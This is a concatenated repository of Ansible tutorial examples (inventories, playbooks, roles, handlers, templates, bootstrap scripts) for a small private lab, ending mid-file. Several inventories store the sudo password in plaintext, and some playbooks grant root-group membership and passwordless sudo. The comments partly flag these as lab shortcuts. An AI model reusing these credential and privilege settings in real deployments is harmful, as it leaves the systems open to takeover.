hosts: all 3 | become: true 4 | tasks: 5 | - name: Create a new user 6 | user: 7 | name: superuser 8 | groups: root 9 | 10 | - name: Add sudoers file for user 11 | copy: 12 | src: sudoer_superuser 13 | dest: /etc/sudoers.d/superuser 14 | owner: root 15 | group: root 16 | mode: 0440 17 | 18 | - name: Create a second user 19 | user: 20 | name: anotheruser 21 | groups: root 22 | 23 | - name: Add sudo privileges to user with password prompt 24 | lineinfile: 25 | path: /etc/sudoers.d/anotheruser 26 | line: "anotheruser ALL=(ALL) ALL" 27 | create: yes 28 | mode: '0440' --------------------------------------------------------------------------------
/IaC/Ansible/examples/13.users/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook playbook.yml 4 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/14.create-sudo-user-and-remove-become/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | # inventory = ./hosts 3 | private_key_file = ~/.ssh/ansible 4 | interpreter_python = auto_silent 5 | 6 | # This is needed to become sudo (see bootstrap.yml) 7 | # remote_user = mrmachine -------------------------------------------------------------------------------- /IaC/Ansible/examples/14.create-sudo-user-and-remove-become/bootstrap.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | become: true 4 | pre_tasks: 5 | # ======================================================== 6 | # Make sure that the system has all updates 7 | - name: Update packages (Debian) 8 | when: ansible_distribution in ["Ubuntu", "Debian"] 9 | apt: 10 | update_cache: yes 11 | 12 | - name: Update packages (Red Hat) 13 | when: ansible_distribution in ["Fedora", "CentOS"] 14 | dnf: 15 | update_cache: yes 16 | # ======================================================== 17 | 18 | 19 | # ======================================================== 20 | # Create sudo user 21 | - name: Create sudo user that will handle operations 22 | user: 23 | name: mrmachine2 24 | groups: root 25 | 26 | - name: Add sudo privileges to user with password prompt 27 | lineinfile: 28 | path: /etc/sudoers.d/mrmachine2 29 | line: "mrmachine2 ALL=(ALL) NOPASSWD:ALL" 30 | create: yes 31 | mode: '0440' 32 | 33 | - name: Add SSH key for user 34 | authorized_key: 35 | user: mrmachine2 36 | key: "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPpCBoxrn+mROgjyVxRTxmH76gLwPCdkkcYbKjFHEswC ansible" 37 | 38 | # 
======================================================== -------------------------------------------------------------------------------- /IaC/Ansible/examples/14.create-sudo-user-and-remove-become/hosts-bootstrap: -------------------------------------------------------------------------------- 1 | [servers] 2 | 192.168.10.78 3 | 192.168.10.79 4 | 192.168.10.77 5 | 6 | [servers:vars] 7 | # This is needed to become sudo (see bootstrap.yml) 8 | ansible_user = vm 9 | 10 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/14.create-sudo-user-and-remove-become/hosts-normal: -------------------------------------------------------------------------------- 1 | [servers] 2 | 192.168.10.78 3 | 192.168.10.79 4 | 192.168.10.77 5 | 6 | [servers:vars] 7 | ansible_user = mrmachine2 8 | 9 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/14.create-sudo-user-and-remove-become/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | become: true 4 | tasks: 5 | 6 | # Keep this task here, because you may need to remove or update your key in the future 7 | - name: Add SSH key for user 8 | authorized_key: 9 | user: mrmachine2 10 | key: "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPpCBoxrn+mROgjyVxRTxmH76gLwPCdkkcYbKjFHEswC ansible" 11 | 12 | # 13 | - name: Install packages 14 | package: 15 | update_cache: yes 16 | name: 17 | - figlet -------------------------------------------------------------------------------- /IaC/Ansible/examples/14.create-sudo-user-and-remove-become/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook -i hosts-bootstrap --ask-become-pass bootstrap.yml 4 | ansible-playbook -i hosts-normal playbook.yml 5 | -------------------------------------------------------------------------------- 
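The two-phase pattern above (bootstrap once with a password, then switch to the key-based `mrmachine2` inventory) is easiest to trust if you verify the new user before relying on it. A minimal sketch of such a check; the `check.yml` file name is hypothetical:

```yaml
# Hypothetical smoke-test playbook (check.yml): confirms that mrmachine2
# can log in with the SSH key and escalate without a password.
# Run with: ansible-playbook -i hosts-normal check.yml
- hosts: all
  become: true
  tasks:
    - name: Run a harmless command as root
      command: whoami
      register: result
      changed_when: false

    - name: Show the escalated user (expected to be root)
      debug:
        var: result.stdout
```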
/IaC/Ansible/examples/15.roles/README.md: -------------------------------------------------------------------------------- 1 | # Roles 2 | 3 | Each role keeps its tasks in its own `tasks/main.yml` 4 | 5 | 6 | ``` 7 | roles 8 | ├── base 9 | | └── tasks 10 | | └── main.yml 11 | └── servers 12 | ├── files 13 | | └── some-file 14 | └── tasks 15 | └── main.yml 16 | ``` -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python = auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 192.168.10.78 6 | 192.168.10.79 7 | 192.168.10.77 8 | 9 | # =================================================================== 10 | 11 | # Vars for all machines in this group 12 | [servers:vars] 13 | 14 | # SSH username 15 | ansible_user=vm 16 | 17 | # Password for sudo privileges (see also become: true in the playbook) 18 | # This is NOT recommended 19 | ansible_become_pass=vm 20 | 21 | # =================================================================== 22 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | become: true 4 | roles: 5 | - base 6 | 7 | - hosts: all 8 | become: true 9 | roles: 10 | - servers -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/roles/base/tasks/main.yml: 
-------------------------------------------------------------------------------- 1 | - name: Update packages (Debian) 2 | when: ansible_distribution in ["Ubuntu", "Debian"] 3 | tags: ubuntu,packages 4 | apt: 5 | update_cache: yes 6 | 7 | - name: Update packages (Red Hat) 8 | when: ansible_distribution in ["Fedora", "CentOS"] 9 | tags: redhat,packages 10 | dnf: 11 | update_cache: yes -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/roles/servers/files/dummy-file-from-roles-example: -------------------------------------------------------------------------------- 1 | an empty file -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/roles/servers/tasks/main.yml: -------------------------------------------------------------------------------- 1 | - name: Install packages (Debian) 2 | when: ansible_distribution in ["Ubuntu", "Debian"] 3 | apt: 4 | update_cache: true 5 | name: 6 | - apache2 7 | state: latest 8 | 9 | - name: Install packages (Red Hat) 10 | when: ansible_distribution in ["Fedora", "CentOS"] 11 | dnf: 12 | update_cache: true 13 | name: 14 | - httpd 15 | state: latest 16 | 17 | 18 | - name: Copy file to servers 19 | copy: 20 | src: dummy-file-from-roles-example 21 | dest: /home/vm/dummy-file-from-roles-example 22 | owner: vm 23 | group: vm 24 | mode: 0644 -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook playbook.yml 4 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ``` 5 | . 
6 | ├── ansible.cfg 7 | ├── hosts 8 | │ └── servers 9 | ├── host_vars 10 | │ ├── 192.168.10.77.yml 11 | │ ├── 192.168.10.78.yml 12 | │ └── 192.168.10.79.yml 13 | └── playbook.yml 14 | ``` 15 | 16 | Inside `host_vars`, the names of the `.yml` files 17 | must match the host names used in the inventory file -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts/servers 3 | private_key_file = ~/.ssh/ansible 4 | interpreter_python = auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/host_vars/192.168.10.77.yml: -------------------------------------------------------------------------------- 1 | host_var_specific_to_this: This_server_is_77 -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/host_vars/192.168.10.78.yml: -------------------------------------------------------------------------------- 1 | host_var_specific_to_this: This_server_is_78 2 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/host_vars/192.168.10.79.yml: -------------------------------------------------------------------------------- 1 | host_var_specific_to_this: This_server_is_79 2 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/hosts/servers: -------------------------------------------------------------------------------- 1 | [servers] 2 | 192.168.10.78 3 | 192.168.10.79 4 | 192.168.10.77 5 | 6 | [servers:vars] 7 | ansible_user=vm 8 | 9 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/playbook.yml: -------------------------------------------------------------------------------- 
1 | --- 2 | # Display host-specific variables 3 | - hosts: all 4 | tasks: 5 | - name: Display message with variables 6 | debug: 7 | msg: "host_var_specific_to_this: {{ host_var_specific_to_this }}, IP: {{ ansible_default_ipv4.address }}" 8 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook playbook.yml 4 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/17.handlers/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python = auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/17.handlers/handlers.yml: -------------------------------------------------------------------------------- 1 | # The name of the handler task should be the same 2 | # as the name used in `notify` 3 | - name: trigger-demo-handler 4 | debug: 5 | msg: "Handler was triggered" -------------------------------------------------------------------------------- /IaC/Ansible/examples/17.handlers/hosts: -------------------------------------------------------------------------------- 1 | [servers] 2 | 192.168.10.78 3 | 192.168.10.77 4 | 5 | [servers:vars] 6 | ansible_user=vm 7 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/17.handlers/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | 4 | handlers: 5 | - import_tasks: handlers.yml 6 | 7 | tasks: 8 | - name: This task will trigger handler 9 | debug: 10 | msg: "Trigger handler..." 
11 | # This tells Ansible that this task should be marked as "changed" no matter what happens. 12 | changed_when: true 13 | 14 | # This is required to trigger the handler 15 | # REMEMBER! The handler will be triggered only 16 | # if a change occurred; for this reason, this example 17 | # uses changed_when: true 18 | notify: trigger-demo-handler 19 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/17.handlers/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook playbook.yml 4 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/18.templates/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python = auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/18.templates/hosts: -------------------------------------------------------------------------------- 1 | [servers] 2 | 192.168.10.78 3 | 192.168.10.77 4 | 5 | [servers:vars] 6 | ansible_user=vm 7 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/18.templates/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | vars: 4 | template_dummy_variable: "this is a dummy variable to test templates" 5 | 6 | tasks: 7 | - name: Render the dummy template 8 | template: 9 | src: "dummy-template.j2" 10 | dest: "/home/vm/dummy-template.txt" 11 | owner: vm 12 | group: vm 13 | mode: 0644 14 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/18.templates/run-playbook.sh: -------------------------------------------------------------------------------- 1 | 
#!/bin/bash 2 | 3 | ansible-playbook playbook.yml 4 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/18.templates/templates/dummy-template.j2: -------------------------------------------------------------------------------- 1 | Some random value: {{ template_dummy_variable }} -------------------------------------------------------------------------------- /IaC/Ansible/examples/2.become-sudo/RUNME: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ## ======================================================================================= 4 | ## Update packages list 5 | ## ======================================================================================= 6 | 7 | ansible all -m apt -a update_cache=true --become --ask-become-pass 8 | 9 | # Command explanation 10 | # -m : the module to run 11 | # -a : the arguments passed to the module 12 | # --become : escalate privileges (sudo) 13 | # --ask-become-pass : prompt for the sudo password 14 | 15 | # i.e. 16 | # -m apt -a update_cache=true --> is the same as running: `sudo apt update` on a Debian system 17 | 18 | ## ======================================================================================= 19 | ## Install all updates 20 | ## ======================================================================================= 21 | 22 | # ansible all -m apt -a "upgrade=dist" --become --ask-become-pass 23 | 24 | ## ======================================================================================= 25 | ## Install application 26 | ## ======================================================================================= 27 | 28 | # Install the latest version of figlet 29 | ansible all -m apt -a "name=figlet state=latest" --become --ask-become-pass 30 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/2.become-sudo/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./servers 3 | # TODO: You need to have this file 4 
| private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/2.become-sudo/servers: -------------------------------------------------------------------------------- 1 | [servers] 2 | 3 | # Server 1 IP 4 | 192.168.10.89 ansible_user=vm 5 | 6 | # Server 2 IP 7 | 192.168.10.98 ansible_user=vm 8 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/3.first-playbook/RUNME: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook --ask-become-pass remove_package.yml 4 | ansible-playbook --ask-become-pass install_package.yml 5 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/3.first-playbook/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./servers 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/3.first-playbook/install_package.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # SPACING MATTERS! 3 | - name: Install package 4 | hosts: servers # Can be one of the groups defined in servers file 5 | become: true # Become sudo user 6 | 7 | tasks: 8 | - name: Update index 9 | apt: 10 | update_cache: yes 11 | 12 | - name: Install figlet 13 | apt: 14 | name: figlet 15 | state: latest -------------------------------------------------------------------------------- /IaC/Ansible/examples/3.first-playbook/remove_package.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # SPACING MATTERS! 
3 | - name: Remove package 4 | hosts: servers # Can be one of the groups defined in servers file 5 | become: true # Become sudo user 6 | 7 | tasks: 8 | - name: Remove figlet 9 | apt: 10 | name: figlet 11 | state: absent -------------------------------------------------------------------------------- /IaC/Ansible/examples/3.first-playbook/servers: -------------------------------------------------------------------------------- 1 | [servers] 2 | 3 | # Server 1 IP 4 | 192.168.10.79 ansible_user=vm 5 | 6 | # Server 2 IP 7 | 192.168.10.78 ansible_user=vm 8 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/4.debug-and-logs/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python = auto_silent 6 | 7 | # Set the default verbosity (2: same as -vv) 8 | verbosity = 2 -------------------------------------------------------------------------------- /IaC/Ansible/examples/4.debug-and-logs/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: A dummy playbook 3 | hosts: servers # Can be one of the groups defined in ./host files 4 | become: true # Become sudo user 5 | tasks: 6 | 7 | # Option 1 8 | - name: Print a custom message 9 | debug: 10 | msg: "Print a custom message" 11 | 12 | # Option 2 13 | - name: Print a variable 14 | debug: 15 | var: ansible_default_ipv4.address 16 | 17 | # Option 3 18 | - name: Display message with variables 19 | debug: 20 | msg: "Interface: {{ ansible_default_ipv4.interface }}, IP: {{ ansible_default_ipv4.address }}" 21 | 22 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/4.debug-and-logs/hosts: -------------------------------------------------------------------------------- 1 | # 
=================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 6 | # Server 1 IP 7 | 192.168.10.78 8 | 9 | # Server 2 IP 10 | 192.168.10.79 11 | 12 | 13 | # =================================================================== 14 | 15 | # Vars for all machines in this group 16 | [servers:vars] 17 | 18 | # SSH username 19 | ansible_user=vm 20 | 21 | # User password (NOT recommended for production, better use SSH key) 22 | # ansible_ssh_pass=vm 23 | 24 | # Password for sudo privileges (see also become: true in the playbook) 25 | # This is NOT recommended 26 | ansible_become_pass=vm 27 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/4.debug-and-logs/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/5.playbook-and-become/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/5.playbook-and-become/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: A dummy playbook 3 | hosts: servers # Can be one of the groups defined in ./host files 4 | become: true # Become sudo user 5 | tasks: 6 | - name: ensure nano is there 7 | apt: # This is a module 8 | name: nano 9 | state: latest -------------------------------------------------------------------------------- /IaC/Ansible/examples/5.playbook-and-become/hosts: -------------------------------------------------------------------------------- 
1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 6 | # Server 1 IP 7 | 192.168.10.78 8 | 9 | # Server 2 IP 10 | 192.168.10.79 11 | 12 | 13 | # =================================================================== 14 | 15 | # Vars for all machines in this group 16 | [servers:vars] 17 | 18 | # SSH username 19 | ansible_user=vm 20 | 21 | # User password (NOT recommended for production, better use SSH key) 22 | # ansible_ssh_pass=vm 23 | 24 | # Password for sudo privileges (see also become: true in the playbook) 25 | # This is NOT recommended 26 | ansible_become_pass=vm 27 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/5.playbook-and-become/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/6.multiple-distros/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/6.multiple-distros/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: A dummy playbook 3 | hosts: servers # Can be one of the groups defined in ./host files 4 | become: true # Become sudo user 5 | tasks: 6 | - name: Update cache 7 | when: ansible_distribution in ["Debian", "Ubuntu"] 8 | apt: # This is a module 9 | update_cache: yes 10 | 11 | - name: ensure nano is there 12 | when: ansible_distribution == "Ubuntu" 13 | apt: # This is a module 14 | name: nano 15 | state: latest 
-------------------------------------------------------------------------------- /IaC/Ansible/examples/6.multiple-distros/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 6 | # Server 1 IP 7 | 192.168.10.78 8 | 9 | # Server 2 IP 10 | 192.168.10.79 11 | 12 | 13 | # =================================================================== 14 | 15 | # Vars for all machines in this group 16 | [servers:vars] 17 | 18 | # SSH username 19 | ansible_user=vm 20 | 21 | # User password (NOT recommended for production, better use SSH key) 22 | # ansible_ssh_pass=vm 23 | 24 | # Password for sudo privileges (see also become: true in the playbook) 25 | # This is NOT recommended 26 | ansible_become_pass=vm 27 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/6.multiple-distros/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/7.improve-playbooks-combine-tasks/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/7.improve-playbooks-combine-tasks/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: A dummy playbook 3 | hosts: servers # Can be one of the groups defined in ./host files 4 | become: true # Become sudo user 5 | tasks: 6 | 7 | # ---------------------------------------------- 8 | # 
Debian based distributions 9 | - name: Debian - Ensure that packages are installed 10 | when: ansible_distribution in ["Ubuntu", "Debian"] 11 | apt: 12 | update_cache: yes # Combine cache update with the installation 13 | name: 14 | - nano 15 | - tmux 16 | - vim 17 | state: latest 18 | 19 | # ---------------------------------------------- 20 | # Red Hat distributions 21 | - name: Red Hat - Ensure that packages are installed 22 | when: ansible_distribution in ["Fedora", "CentOS"] 23 | dnf: 24 | update_cache: yes # Combine cache update with the installation 25 | name: 26 | - nano 27 | - tmux 28 | - vim 29 | state: latest -------------------------------------------------------------------------------- /IaC/Ansible/examples/7.improve-playbooks-combine-tasks/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 6 | # Server 1 IP 7 | 192.168.10.78 8 | 9 | # Server 2 IP 10 | 192.168.10.79 11 | 12 | 13 | # =================================================================== 14 | 15 | # Vars for all machines in this group 16 | [servers:vars] 17 | 18 | # SSH username 19 | ansible_user=vm 20 | 21 | # User password (NOT recommended for production, better use SSH key) 22 | # ansible_ssh_pass=vm 23 | 24 | # Password for sudo privileges (see also become: true in the playbook) 25 | # This is NOT recommended 26 | ansible_become_pass=vm 27 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/7.improve-playbooks-combine-tasks/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/8.improve-playbooks-use-variables/ansible.cfg: 
-------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/8.improve-playbooks-use-variables/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: A dummy playbook 3 | hosts: servers # Can be one of the groups defined in ./host files 4 | become: true # Become sudo user 5 | tasks: 6 | 7 | - name: Ensure that packages are installed 8 | when: ansible_distribution in ["Ubuntu", "Debian"] 9 | package: # package is a generic module (it will use whatever package manager the system has, e.g. pacman, apt, dnf) 10 | update_cache: yes # Combine cache update with the installation 11 | name: 12 | - nano 13 | - tmux 14 | - vim 15 | - "{{ apache_package }}" # See hosts 16 | state: latest 17 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/8.improve-playbooks-use-variables/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers:children] 5 | debianservers 6 | redhatservers 7 | 8 | 9 | [debianservers] 10 | # Server 1 IP 11 | 192.168.10.78 12 | 13 | # Server 2 IP 14 | 192.168.10.79 15 | 16 | [redhatservers] 17 | 192.168.10.77 18 | 19 | # =================================================================== 20 | 21 | # Vars for all machines in this group 22 | [servers:vars] 23 | 24 | # SSH username 25 | ansible_user=vm 26 | 27 | # User password (NOT recommended for production, better use SSH key) 28 | # ansible_ssh_pass=vm 29 | 30 | # Password for sudo privileges (see also become: true in the playbook) 31 | # This is NOT recommended 32 | ansible_become_pass=vm 33 | 34 | # =================================================================== 35 | 36 | [debianservers:vars] 37 | apache_package = apache2 38 | 39 | [redhatservers:vars] 40 | apache_package = httpd 41 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/8.improve-playbooks-use-variables/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/9.groups-target-nodes/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/9.groups-target-nodes/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: Debian install packages 3 | hosts: debianservers # Can be one of the groups defined in ./host files 4 | become: true # Become sudo user 5 | tasks: 6 | - name: Ensure that packages are installed 7 | when: ansible_distribution in ["Ubuntu", "Debian"] 8 | apt: 9 | update_cache: yes # Combine cache update with the installation 10 | name: 11 | - nano 12 | - tmux 13 | - vim 14 | - apache2 15 | state: latest 16 | 17 | 18 | - name: Red Hat install packages 19 | hosts: redhatservers # Can be one of the groups defined in ./host files 20 | become: true # Become sudo user 21 | tasks: 22 | 23 | - name: Ensure that packages are installed 24 | when: ansible_distribution == "Fedora" 25 | dnf: 26 | update_cache: yes # Combine cache update with the installation 27 | name: 28 | - python3-libdnf5 29 | - httpd 30 | state: latest 31 | 
-------------------------------------------------------------------------------- /IaC/Ansible/examples/9.groups-target-nodes/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers:children] 5 | debianservers 6 | redhatservers 7 | 8 | [debianservers] 9 | # Server 1 IP 10 | 192.168.10.78 11 | 12 | # Server 2 IP 13 | 192.168.10.79 14 | 15 | [redhatservers] 16 | 192.168.10.77 17 | 18 | # =================================================================== 19 | 20 | # Vars for all machines in this group 21 | [servers:vars] 22 | 23 | # SSH username 24 | ansible_user=vm 25 | 26 | # User password (NOT recommended for production, better use SSH key) 27 | # ansible_ssh_pass=vm 28 | 29 | # Password for sudo privileges (see also become: true in the playbook) 30 | # This is NOT recommended 31 | ansible_become_pass=vm 32 | 33 | # =================================================================== 34 | 35 | [debianservers:vars] 36 | apache_package = apache2 37 | 38 | [redhatservers:vars] 39 | apache_package = httpd 40 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/9.groups-target-nodes/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/README.md: -------------------------------------------------------------------------------- 1 | # Ansible structure template 2 | 3 | What it contains 4 | - Files 5 | - Handlers 6 | - Group, Host vars, vars 7 | - Roles 8 | - Templates 9 | - Playbook 10 | - Inventories 11 | - Conditions 12 | - Loops 13 | - Files/Copy 14 | - Package managers, Services 
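Several of the items listed in the README above (conditions, loops, package managers) can be combined in a single task. A minimal sketch, assuming a Debian-family host; the package names are only illustrative:

```yaml
# Combines a condition (when) with a loop, two of the features
# listed in the structure-template README.
- name: Install base packages on Debian-family hosts
  when: ansible_os_family == "Debian"
  apt:
    name: "{{ item }}"
    state: present
  loop:
    - git
    - tmux
```

Note that for the `apt` module specifically, passing the whole list to `name` in one task is faster than looping, since it resolves all packages in a single transaction.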
-------------------------------------------------------------------------------- /IaC/Ansible/structure-template/RUN_BOOTSTRAP: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # First initiate the environment 4 | ansible-playbook --ask-become-pass bootstrap.yml 5 | 6 | # Then you can run playbooks like this one 7 | ansible-playbook bootstrap_complete.yml -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | # Either ini or yml file format 3 | # inventory = ./hosts/servers.ini 4 | inventory = ./hosts/servers.yml 5 | 6 | private_key_file = ~/.ssh/ansible 7 | interpreter_python = auto_silent 8 | 9 | # Number of processes to run at the same time 10 | forks = 3 11 | 12 | # Log file 13 | log_path = ./logs/ansible-logs.txt 14 | 15 | [privilege_escalation] 16 | # If we need to have root privileges 17 | # become = true 18 | # become_method = sudo 19 | # ask_become_pass = true -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/bootstrap.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # =========================================================================================================== 3 | # BOOTSTRAP PROCESS 4 | # =========================================================================================================== 5 | 6 | - hosts: all 7 | become: true 8 | 9 | # [IMPORTANT] This is the SSH user 10 | vars: 11 | ansible_user : "vm" 12 | 13 | pre_tasks: 14 | # ======================================================== 15 | # Make sure that the system has all updates 16 | # This is not mandatory, but it is good practice 17 | - name: Update packages (Debian) 18 | # This is a condition 19 | when: ansible_distribution in ["Ubuntu", "Debian"] 
20 | apt: 21 | update_cache: yes 22 | 23 | - name: Update packages (Red Hat) 24 | # This is a condition 25 | when: ansible_distribution in ["Fedora", "CentOS"] 26 | dnf: 27 | update_cache: yes 28 | # ======================================================== 29 | 30 | 31 | # ======================================================== 32 | # Create sudo user 33 | # Instead of using the ssh user for sudo access, create a local user 34 | # which will have sudo privileges; this way we do not need to pass a become password on every run 35 | 36 | - name: Create sudo user that will handle operations 37 | user: 38 | name: mrmachine2 39 | groups: root 40 | 41 | - name: Add passwordless sudo privileges to user 42 | lineinfile: 43 | path: /etc/sudoers.d/mrmachine2 44 | line: "mrmachine2 ALL=(ALL) NOPASSWD:ALL" 45 | create: yes 46 | mode: '0440' 47 | 48 | - name: Add SSH key for user 49 | authorized_key: 50 | user: mrmachine2 51 | key: "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPpCBoxrn+mROgjyVxRTxmH76gLwPCdkkcYbKjFHEswC ansible" 52 | 53 | # ======================================================== 54 | # Login message added to inform users that this server is managed by ansible 55 | - name: Create Message of the Day file 56 | copy: 57 | content: "THIS MACHINE IS MANAGED BY ANSIBLE! 
